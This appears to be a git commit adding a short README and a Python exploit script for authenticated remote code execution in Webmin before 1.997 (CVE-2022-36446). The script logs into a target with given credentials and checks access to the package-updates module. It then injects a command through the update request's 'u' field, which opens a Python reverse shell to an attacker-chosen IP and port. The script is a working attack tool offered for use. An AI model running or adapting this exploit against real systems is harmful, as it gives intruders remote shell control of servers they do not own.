add Webmin 1.996 RCE (Authenticated) exp，优化目录

2022-10-31 15:16:34 +08:00 · 2022-10-31 15:16:34 +08:00 · 5c1882ff19
commit 5c1882ff19
parent 055f7b7627
5 changed files with 85 additions and 0 deletions
--- a/CMS/Webmin/README.md
+++ b/CMS/Webmin/README.md
--- a/CMS/Webmin/exploit.py
+++ b/CMS/Webmin/exploit.py
--- a/CMS/Webmin/images/服务器返回内容.png
+++ b/CMS/Webmin/images/服务器返回内容.png
--- a/CMS/Webmin/Webmin
+++ b/CMS/Webmin/Webmin
@ -0,0 +1,8 @@
+# Webmin 1.996 RCE (Authenticated)
+
+### CVE
+CVE-2022-36446
+
+### 影响版本
+
+version：< 1.997
--- a/CMS/Webmin/Webmin
+++ b/CMS/Webmin/Webmin
@ -0,0 +1,77 @@
+#!/usr/bin/env python
+# -*- coding:utf-8 -*-
+
+import argparse
+import requests
+from bs4 import BeautifulSoup
+
+
+def login(args):
+    global session
+    global sysUser
+
+    session = requests.Session()
+    loginUrl = f"{args.target}:10000/session_login.cgi"
+    infoUrl = f"{args.target}:10000/sysinfo.cgi"
+
+    username = args.username
+    password = args.password
+    data = {'user': username, 'pass': password}
+
+    login = session.post(loginUrl, verify=False, data=data, cookies={'testing': '1'})
+    sysInfo = session.post(infoUrl, verify=False, cookies={'sid': session.cookies['sid']})
+
+    bs = BeautifulSoup(sysInfo.text, 'html.parser')
+    sysUser = [item["data-user"] for item in bs.find_all() if "data-user" in item.attrs]
+
+    if sysUser:
+        return True
+    else:
+        return False
+
+
+def exploit(args):
+    payload = f"""
+    1337;$(python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{args.listenip}",{args.listenport}));
+    os.dup2(s.fileno(),0);
+    os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")');
+    """
+
+    updateUrl = f"{args.target}:10000/package-updates"
+    exploitUrl = f"{args.target}:10000/package-updates/update.cgi"
+
+    exploitData = {'mode': 'new', 'search': 'ssh', 'redir': '', 'redirdesc': '', 'u': payload, 'confirm': 'Install+Now'}
+
+    if login(args):
+        print("[+] Successfully Logged In !")
+        print(f"[+] Session Cookie => sid={session.cookies['sid']}")
+        print(f"[+] User Found  => {sysUser[0]}")
+
+        res = session.get(updateUrl)
+        bs = BeautifulSoup(res.text, 'html.parser')
+
+        updateAccess = [item["data-module"] for item in bs.find_all() if "data-module" in item.attrs]
+
+        if updateAccess[0] == "package-updates":
+            print(f"[+] User '{sysUser[0]}' has permission to access <<Software Package Updates>>")
+            print(f"[+] Exploit starting ... ")
+            print(f"[+] Shell will spawn to {args.listenip} via port {args.listenport}")
+
+            session.headers.update({'Referer': f'{args.target}:10000/package-updates/update.cgi?xnavigation=1'})
+            session.post(exploitUrl, data=exploitData)
+        else:
+            print(f"[-] User '{sysUser[0]}' unfortunately hasn't permission to access <<Software Package Updates>>")
+    else:
+        print("[-] Login Failed !")
+
+
+if __name__ == '__main__':
+    parser = argparse.ArgumentParser(description="Webmin < 1.997 - Remote Code Execution (Authenticated)")
+    parser.add_argument('-t', '--target', help='Target URL, Ex: https://webmin.localhost', required=True)
+    parser.add_argument('-u', '--username', help='Username For Login', required=True)
+    parser.add_argument('-p', '--password', help='Password For Login', required=True)
+    parser.add_argument('-l', '--listenip', help='Listening address required to receive reverse shell', required=True)
+    parser.add_argument('-lp', '--listenport', help='Listening port required to receive reverse shell', required=True)
+    parser.add_argument("-s", '--ssl', help="Use if server support SSL.", required=False)
+    args = parser.parse_args()
+    exploit(args)